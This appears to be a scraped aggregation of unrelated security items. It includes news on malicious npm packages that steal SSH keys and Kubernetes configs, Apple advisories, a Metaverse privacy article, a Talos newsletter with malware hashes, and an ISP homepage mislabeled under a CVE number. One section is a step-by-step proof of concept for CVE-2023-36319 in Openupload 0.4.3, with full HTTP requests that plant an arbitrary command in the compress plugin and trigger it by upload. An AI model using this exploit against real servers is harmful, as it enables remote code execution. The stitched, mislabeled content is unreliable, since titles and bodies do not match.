An XPC misconfiguration vulnerability in CoreCode MacUpdater before 2.3.8, and 3.x before 3.1.2, allows attackers to escalate privileges by crafting malicious .pkg files.

CVE-2023-41902: MacUpdater Version History

Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server.
Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core,

Kubernetes / Supply Chain Attack

Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server.

Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core, @dynamic-form-components/mui, @dynamic-form-components/shineout, @expue/app, @fixedwidthtable/fixedwidthtable, @soc-fe/use, @spgy/eslint-plugin-spgy-fe, @virtualsearchtable/virtualsearchtable, and shineouts.

"These packages \[...\] attempt to impersonate JavaScript libraries and components, such as ESLint plugins and TypeScript SDK tools," the software supply chain security firm said. "But, upon installation, multiple versions of the packages were seen running obfuscated code to collect and siphon sensitive files from the target machine."

Along with Kubernetes config and SSH keys, the modules are also capable of harvesting system metadata such as username, IP address, and hostname, all of which are transmitted to a domain named app.threatest\[.\]com.

The disclosure comes a little over a week after Sonatype detected counterfeit npm packages that exploit a technique known as dependency confusion to impersonate internal packages purportedly used by PayPal Zettle and Airbnb developers as part of an ethical research experiment.

That said, threat actors continue to target open-source registries like npm and PyPI with cryptojackers, infostealers, and other novel malware to compromise developer systems and ultimately poison the software supply chain.

In one instance highlighted by Phylum earlier this month, an npm module named hardhat-gas-report remained benign for more than eight months since January 6, 2023, before receiving two back-to-back updates on September 1, 2023, to include malicious JavaScript capable of exfiltrating Ethereum private keys copied to the clipboard to a remote server.

"This targeted approach indicates a sophisticated understanding of cryptocurrency security and suggests that the attacker is aiming to capture and exfiltrate sensitive cryptographic keys for unauthorized access to Ethereum wallets or other secured digital assets," the company said.

UPCOMING WEBINAR

Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM

Stay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.

Supercharge Your Skills

Another case of an attempted supply chain attack involved a crafty npm package called gcc-patch that masquerades as a bespoke GCC compiler but actually harbors a cryptocurrency miner that "covertly taps into the computational power of innocent developers, aiming to profit at their expense."

What's more, such campaigns have diversified to span the Javascript (npm), Python (PyPI) and Ruby (RubyGems) ecosystems, what with threat actors uploading several packages with data collection and exfiltration capabilities and following it up by publishing new versions carrying malicious payloads.

The campaign specifically targets Apple macOS users, indicating that malware in open-source package repositories is not only becoming increasingly prevalent, but are also singling out other operating systems beyond Windows.

"The author of these packages is staging a broad campaign against software developers," Phylum noted in an analysis. "The end goal of this campaign remains unclear."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys

File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.

**CVE-2023-36319**

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.

**Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.**

**Affected version:**

openupload Stable version 0.4.3

**Step one**

Log in to the backend and click on the function: Administration ->Plugins ->compress

Add new “command” directive and save:

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 183
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
    

**Step two**

Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 53
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=u&step=3&description=123&emailme=no&compress=0
    

The commands we write will be executed normally.

CVE-2023-36319: GitHub - Lowalu/CVE-2023-36319: exp4CVE-2023-36319

Categories: Personal
Tags: metaverse

Tags:  meta

Tags:  Facebook

Tags:  VR

Tags:  AR

Tags:  XR

Tags:  reality

Tags:  virtual reality

Tags:  privacy

Tags:  safety

We take a look at the privacy implications of the Metaverse.



(Read more...)




The post The privacy perils of the Metaverse appeared first on Malwarebytes Labs.

A recently released report from New York University claims that the Metaverse, an all-in-one virtual online space, poses a potentially major risk to user privacy. This is because headsets and other similar devices can collect an incredible amount of personal, physical and biometric information. The user isn’t always aware of the collection, or how it could be used in ways they don’t expect.

It’s worth asking at this point: what is the Metaverse?

Most folks would think of Mark Zuckerberg and Meta, with a virtual reality headset thrown in for good measure. Others may associate it with “game hub” style online places to meet others taking place on their computer screens only. For some, mobile devices making use of augmented or mixed reality will be their first association.

The truth is that “Metaverse” can incorporate any or all of these different aspects. While some people hope for a world of entirely connected systems, the reality is that this is not going to happen for a very long time and may not happen at all. In fact, the Metaverse overall is not in the most robust of health, with proclamations of its demise across the web.

While it continues to struggle on, it’s still worth considering some of the potential privacy pitfalls waiting for any curious users. A good chunk of these come from the gaming space, and in particular advergaming (the art of displaying targeted adverts inside of virtual realms).

When playing a virtual reality game, the headset is an important part of gameplay. It typically contains several cameras (pointing both in and out), along with various sensors and microphones. These tools all help to track eye movements, interact with the digitally realised space around the user, and assist the game to keep track of what the player is doing.

While this is generally fine for an offline game with no data being sent elsewhere, once additional first or third-party systems are introduced this can become a risk. Is an ad network layered across the game? How does the network serve targeted ads? What is it tracking? Is player data sent to the advertisers, or does the game provider start building up a profile for non-gaming purposes? Is any of this disclosed?

This is just one basic example. Now consider that all of those eye movements, those motions, those biometrics are also up for grabs in terms of being able to build up pictures of users.

The research notes that Meta’s approach is more about harvesting user data (via profiles) for targeted ads. Apple, meanwhile, shifts its cost toward expensive high-end devices instead of purely advertising. Additionally, Apple does not collect eye-movement data whereas Meta “disclaims responsibility for the data practices of third-party developers with whom the company shares user data”.

Even so, Apple has not yet revealed what it intends to do with face-tracking and body-motion data. The researchers note that the specifics for the company's upcoming Vision Pro device does not yet have a detailed privacy policy.

This is just one small consideration of the upcoming data collection landscape where Metaverse is concerned. However, with the downsizing in expectation for these virtual worlds as a whole, these issues may not be as far reaching as they potentially could have been.

The report comes with numerous recommendations for safety features and privacy functionality, some of which have existed in video game/VR circles for some time now, though not always with success.

For example, Meta ran into several problems with regard to sexual harassment in virtual spaces. One of many issues was that a “bubble” around users in VR realms can prevent others from harassing or getting too close. Bafflingly, this wasn’t enabled in Meta as a default setting until the damage was already done.

Child safety is also another concern, given that headset use isolates the user and makes it harder for parents to see at a glance what their child may be doing.

Gaming platforms and consoles often come with a wide range of granular privacy and security controls. In VR, these controls aren’t always obvious and users may not know how to reach them. For example, hiding names, blurring faces, preventing the sending of data to unwanted third-parties and so on. These options should always be clear and evident to whoever happens to be using the device.

The full report is available to read here. Metaverse may not be the hot property it once was, but it's still worth learning about the possible dangers and privacy risks inherent in the headset.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The privacy perils of the Metaverse

An information leak in YKC Tokushima_awayokocho Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.

*   Home
*   Services
    *   Home Internet
    *   Voice Services
    *   Home Security
*   Our Story
    *   Our Mission
    *   Community Involvement
    *   Scholarship & Grants
*   Careers
*   Support
    *   Understanding Your Bill
    *   Tech Glossary
    *   Wi-Fi 101 Videos
*   Blog
*   Contact Us

Menu

*   Home
*   Services
    *   Home Internet
    *   Voice Services
    *   Home Security
*   Our Story
    *   Our Mission
    *   Community Involvement
    *   Scholarship & Grants
*   Careers
*   Support
    *   Understanding Your Bill
    *   Tech Glossary
    *   Wi-Fi 101 Videos
*   Blog
*   Contact Us

Menu

**Ready to Get Connected?**

Find out which of our services are available in your area.

**A Proud Rural Service Provider**

**DRIVEN TO BE THE BEST**

YK Communications strives to provide superior communications technologies to the homes and businesses in our service areas.

We deliver an exceptional level of local customer care with personal attention, prompt responses, and strong working relationships.

Our owners, management team, and employees all live in, work in, and enthusiastically support the communities we serve.

**A Customizable Experience**

With Whole-Home Wi-Fi and a CommandIQ app, you have complete control over things like parental controls and cybersecurity!

**Speeds Up To 1 GIG**

We’ve got fiber, yes we do. So whether you are busy gaming, streaming, downloading, or re-spawning – you can leave the lag behind.

**24/7 Technical Support**

YK Communications makes it a priority to keep you connected. Technical support is available 24 hours a day, 7 days a week.

**BUILD YOUR CUSTOM EXPERIENCE**

Our experience-enhancing add-ons allow you to build the service that works best for you and your household. Contact a specialist today for a free service consultation by calling 

(361) 771-3334.

**Click To Learn More About:**

**WAYS TO SAVE**

**on Services you Need**

YK Communications works to offer exceptional services without cutting corners – but sometimes we can help you cut down on extra costs through promotions. Check out the options below for details.

**Your Neighbors Are**

**OUR HAPPY CUSTOMERS**

“Great customer service, and very helpful with everything! We use them for all our security, phone, internet, website, and more! So glad we can shop local! YKC has always supported our local community which gives you more reasons to shop local! When is the last time the mall or Apple has supported the local 4H, Boy/Girl Scouts, the school, Volunteer Fire Department, and more? Thank you Ganado Telephone and YKC for all you do for our personal and public needs.”

**Seth Brezina**

**Read What’s Happening On**

**THE YK BLOG**

**Troubleshooting Your Wi-Fi: What Else Causes Internet Connectivity Issues?**

As a YK Communications internet service customer, you rely on your Wi-Fi connection for everything from streaming movies and playing games to online shopping and staying connected with family and friends. So, when something goes wrong, it can be frustrating and even stressful. However, before you call our 24/7 support team, there are a few things you can try to

Read More

**Beware of Summer Security Scams: Stay Protected with YK Communications**

With the onset of summer and the increasing temperatures, many of us look forward to spending more time outdoors. However, this delightful season also brings along a less pleasant annual tradition – the influx of door-to-door salesmen, often peddling home security systems. While some represent legitimate companies, others exploit the summer spike in sales activity to blend in and prey

Read More

**We're Social!**

Like and follow us online @ykcomms

Next To You. Ahead Of Technology. We’re a local provider of residential and business-class InternetA global wide area network (WAN), also described as a networ… More, Voice, Video and Security services in Texas.

**Quick Links**

**Give Us A Call**

**to get connected or upgrade!**

**Visit Us**

All rights reserved. Copyrighted 2023 by YK Communications.

CVE-2023-39043: Home - YK Communications

Apple Security Advisory 2023-09-11-3 - macOS Big Sur 11.7.10 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-11-3 macOS Big Sur 11.7.10

macOS Big Sur 11.7.10 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213915.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Big Sur 11.7.10 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3MACgkQX+5d1TXa  
IvqNSg//bbzgVN2E8yAjEnjXK08rQlR7TmCxvDCa9s2GI3hPYb881pMDz2kG4ntu  
C8MaKgYwQ8f6DKowxL2bJAXz9p48tzfHEcxVVCW3vwel0MrstLQRllrv4GrRrU2T  
/kkOWs4WZPQYMuvf+j08+KlGOWwPdhxNBlkzoZKe1Sq0DKFOBhdwnBfUsQgREMK+  
zFz7iVYHKCgAs8hQwOA7mmxa7W42PO5XuBh2d4bxsjiV+63Z4vIhy3uiXrqGDolT  
pOLsOXpRaLxDeVTi7/AKBJcR+ScC/wTinCBaFuELqQsXeYVKJeLl901MYa54VZtf  
6x+7c/QOKf8LUQR58VH9uB1cRGaC4rI0GfGBMZAR3C1xhM0TRzHuH6HOsBK2ZQva  
OprPGZ8aNb1XhuuZeYYxNnXOtmto8V8ZynBzjoPv5P3BeaBgRbpOnlIsamSTQUeb  
BSLnKQ6MbDbrGBQHcqKhdYyL65EzXGfoYgLbKG+FdzoaTdJ8EO+FXum6smPcHEvm  
uzHkCQvYPZ6ZpeGQ3OPrD0mqTrqdI5JwdM1Qj3ks5srGHH8UYK1k1TQx5kK/5MX1  
1ASkIhexyGtDS3DNVWOaDniRXA6bMNrJCNQC7PU5O1Py0kR1gITB9WAP+LOQ4PBF  
Of9Y2FxFxHMYJ40gHwa5e/mo4Sf5fvnr9WUU9/34VC5f+tTI47M=  
=bfbZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-3

Apple Security Advisory 2023-09-11-2 - macOS Monterey 12.6.9 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-11-2 macOS Monterey 12.6.9

macOS Monterey 12.6.9 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213914.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Monterey 12.6.9 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3IACgkQX+5d1TXa  
IvrzPg//a+Al1VjRmASSN1lWptcH3EN4AcviKdzPAcl3Wtlh/28UFzIuMkgyH7B/  
e0VUEgqo+4RqyYVfmWTZJBQ9J0otX3M+wG9XRVt3VlgwStqQ9+sjK1nRIMKq3YO6  
KMVM9TggVAqEQOOTvdPhsb439RoP2q8kAiQnxw0r/CqzWkPnLvDTdLGWW5WO4G2Q  
tFv7z2nV4aPsmZWDwsfc4S8UyrAP+57iBLpegwD6kLaLiRFOm4ZS/bPmWYck0HDK  
qojdx6gJ3fYVCoMexiJuBLpJWdCA582f8SfsgYj1/pIwmTC2Vu5HZz3FxF6ULAuY  
rbmcZO2zA9w30XgjPDtWQ3l00mVi8Pnod4gDD0bN2aYuDtTXWQ7U/zmkT65kDLPO  
uQCZmBAeRLaaUnBlmGRpHBe7zqLlUTU+AcjzRwcXs7WnEuZ59WVCkMlQIELmAx2m  
/2jEcMMBe9GNnxEcSa7N0HBbuPHrakC5JA4u63SYeb2NHe9i5PPlwQvRHJJ+Atps  
LpsqgdSNk0LmLgldzglIVdhoRBo6F3i1BuIeof0STBLgl3AM1jJJWeL0wPv5RV95  
eIN+Uvs7ni1OUZUq0Io7vAg1alyZAv6TZEz8venYA0J+2WxFVu/jOaOxwGJUyzQf  
7fblA7wBfxZ+TdZKzaU6OUCoJP/g/gDWzrBG+0EJGH9dcxJP8no=  
=I1tR  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-2

Apple Security Advisory 2023-09-11-1 - iOS 15.7.9 and iPadOS 15.7.9 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-09-11-1 iOS 15.7.9 and iPadOS 15.7.9iOS 15.7.9 and iPadOS 15.7.9 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213913.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.ImageIOAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch(7th generation)Impact: Processing a maliciously crafted image may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited.Description: A buffer overflow issue was addressed with improved memoryhandling.CVE-2023-41064: The Citizen Lab at The University of Torontoʼs MunkSchoolThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.7.9 and iPadOS 15.7.9".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3IACgkQX+5d1TXaIvq6Ww//WB9pTBOCCs5nm4b199CRT+zde3vODQd70Jk6hux40O+XnoObqqpB3ZxDeiklegUOLEbGhgKqHyLMWxDUXCx0FaQMx2EzzwfRkYGSRnreDnFLd1V50mC4kWukw711Y6ZEdwrV9DhK0/M/3lzbhOMt4lLrPYeb4i2LJ/zFsqVTW8lrLqITkA3RapnsMtMH/zXzL5PYmNMP8Vbjudb+9T0LQ5+WEh4JvGheVnxe/X7Ijqv+v5MUUbp6U31jxvTrhcKKsOqSgJrBTxoE+AICD7uEFNpcdxXo+yFOfFP7F//iXVWGYGpjb/xmmxiWZGFKhQkuM1wk9tCLZEhQYVRplKAtxTTEzoXfdCLWbHn6drxX2oFA+BThwnInUO2zAGcy2MOoPK9F+JZPheMGdE9ZJa/B8s/Vtim1KL6nQukVXpqtC77RQHo2c5IeDQBSnzhdxLxAL2qqENLt/rrY3tQvvPt5aithjJ4y4wwSUeeavcEqyHbum2XavwmK7YpHiGRdb76wQFd7gISPlgEuDW9mK8bsrNOUk9UDu6EgXrIGgjpvT/YSd779UgxcTUusBfWigHBgtvXF8ju5QrECxNSSRz/Byh+j7Pbf6iVMrvU9TyIJrhIhtHNWMx1fwQVp+eIp5LLjSc1OM0swUL1qtsgXlxcVLkMc0HmFd1BVQRi1g5Pdyp0==+8rR-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-1

The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the 'link' parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVE-2023-3025: Principal.php in dropbox-folder-share/trunk/HynoTech/DropboxFolderShare – WordPress Plugin Repository

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50.

Thursday, September 14, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

I’m at the point in the calendar year where I’m a sponge for NFL content. I couldn’t be happier to escape from my six-month American football-free slumber and am ready to watch games three days a week and listen to NFL podcasts or read power rankings the other four.

So of course, I wasn’t going to miss this feature in Dark Reading from the NFL’s chief information security officer, which just happens to include several shoutouts to Talos and Cisco. Talos is a valuable security partner with the NFL, helping secure their major events like the NFL Draft and Super Bowl, the most-watched entertainment event in the U.S. every year.

One of the things that Tomás Maldonado said in the Dark Reading interview really stood out to me — that he’s worried about deepfakes of NFL players being used in scams. Deepfakes have been making the rounds for years in scams of celebrities and politicians seeming to ask for various things (often money), and Maldonado said he’s worried that attackers could start using the likenesses of popular NFL players for scams and spam.

I actually hadn’t realized that deepfakes had already been around in the NFL sphere for a while, though.

In an ESPN “30 for 30” documentary in 2021, the creators used deepfake, AI voices for former Raiders owner Al Davis and former commissioner Pete Rozelle, who both died many years before the creation of this documentary. Public reception was mixed, at best.

The league’s Dallas Cowboys are also jumping on the AI train and created a hologram, AI-powered version of team owner Jerry Jones. Fans can pay $55 to take a tour of the Cowboys’ AT&T Stadium and ask the AI version of Jones questions (as a Browns fan, I mainly would just like to thank him for only asking for a fifth-round pick in exchange for receiver Amari Cooper).

Bad actors have shown they will literally use any and all forms of deepfakes to try and trick users. So it’s not hard to see where Maldonado is coming from with his concerns.

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50. This just isn’t a particular attack vector I had considered before — I always assumed deepfakes were reserved for political leaders or some of the highest-profile people in the world.

And while I couldn’t find any current examples of where this is actively happening in the wild, it’s not a crazy jump to think that if ESPN can create a convincing AI version of Al Davis that someone else can’t make an AI voice that sounds just like Aaron Rodgers asking for money or a fake Russell Wilson pushing season ticket “deals.”

**The one big thing**

Microsoft disclosed two zero-day vulnerabilities as part of this monthly security update on Tuesday, one of which already has proof-of-concept code floating around in the wild. There are five other critical vulnerabilities included in September’s Patch Tuesday, which is relatively low for a traditional Microsoft security release, and 56 vulnerabilities the company considers “important.”

**Why do I care?**

One of the vulnerabilities adversaries are already exploiting in the wild is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service, a corporate video sharing platform integrated into SharePoint and Office 365. An adversary who successfully exploits this vulnerability can gain SYSTEM privileges. Additionally, CVE-2023-36761 has already been exploited in the wild and proof of concept code is publicly available. Although it is not clear how exactly an attacker could exploit this vulnerability in Microsoft Word, Microsoft states that the Preview Pane is also a potential attack vector in this case. If successful, an adversary could view NTLM hashes. Microsoft’s warnings about these vulnerabilities indicate attackers are already exploiting these issues in the wild, even prior to Tuesday’s patch, so all users should be sure to patch these ASAP.

**So now what?**

Microsoft’s security update guide has all the patches users need to install, which everyone should do now if they haven’t already. Talos’ Patch Tuesday blog also outlines several Snort rules we released to detect the exploitation of some of these vulnerabilities.

**Top security headlines of the week**

**Apple released a series of security updates over the past week that users of all the companies’ mobile devices are encouraged to install as soon as possible.** A security update on Sept. 7 warned that users needed to update to iOS 16.6.1 or iPadOS 16.6.1 right away to fix security updates that attackers were actively exploiting in the wild. In some cases, these exploits led to the installation of spyware on targeted devices. Apple said in an advisory that, “Processing a maliciously crafted image may lead to arbitrary code execution.” The company followed that up with another security update on Monday for older models of iPhones, iPads, Macs and other Apple devices that "provides important security fixes,” likely the same vulnerabilities. Apple was scheduled to announce its newest iPhone and Apple Watch at an event Wednesday. (USA Today, CNET)

**The U.S. and U.K. have sanctioned more alleged members of the Trickbot cybercrime ring.** Law enforcement officials in both countries announced sanctions against 11 individuals they claim are “involved in management and procurement for the Trickbot group.” Trickbot is known for targeting large businesses and organizations with ransomware and has alleged ties to the Russian government. Seven of the people listed are also charged with working with the Conti ransomware group, which broke up at the end of 2022. These people are alleged "administrators, managers, developers, and coders” for Conti. The U.K.’s National Crime Agency reported that Trickbot attacks have generated an estimated $180 million from victims, $33.6 million of that coming from victims in the U.K. The group’s list of reported victims includes hospitals, schools and government agencies across the globe. (TechCrunch, Dark Reading)

**Security researchers are concerned that adversaries are starting to crack stolen passkeys taken during a data breach at LastPass.** More than 150 people recently affected by cryptocurrency wallet thefts were LastPass users, leading to the equivalent of $35 million in virtual currency being stolen. Many cryptocurrency consumers use security phrases to protect their wallets, and then store that phase in an encrypted folder inside a password manager like LastPass. If an attacker were able to learn that phrase, they could essentially access all the victims’ cryptocurrency holdings tied to that key. LastPass has yet to comment on the researchers’ findings because they said an active law enforcement investigation is still ongoing into the 2022 breach. (Krebs on Security, The Verge)

**Can’t get enough Talos?**

*   Talos Takes Ep. #154: SapphireStealer hits the open internet
*   Researcher Spotlight: You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)
*   Eight vulnerabilities in Open Automation Software Platform could lead to information disclosure, improper authentication
*   Cyber-criminals Exploit GPUs in Graphic Design Software

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> _Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647  
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790  
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

**SHA 256:** d5763a87ec22a583b9dd853e31a9d4cb187d81251ce51099ce3d0f749bbf405a  
**MD5:** 5cedec562076ac629453cc99dd0cdda6  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5763a.in03.Talos

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827  
**MD5:** bf357485cf123a72a46cc896a5c4b62d  
**Typical Filename:** bf357485cf123a72a46cc896a5c4b62d.virus  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5219579ee.in03.Talos

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

Tag

#apple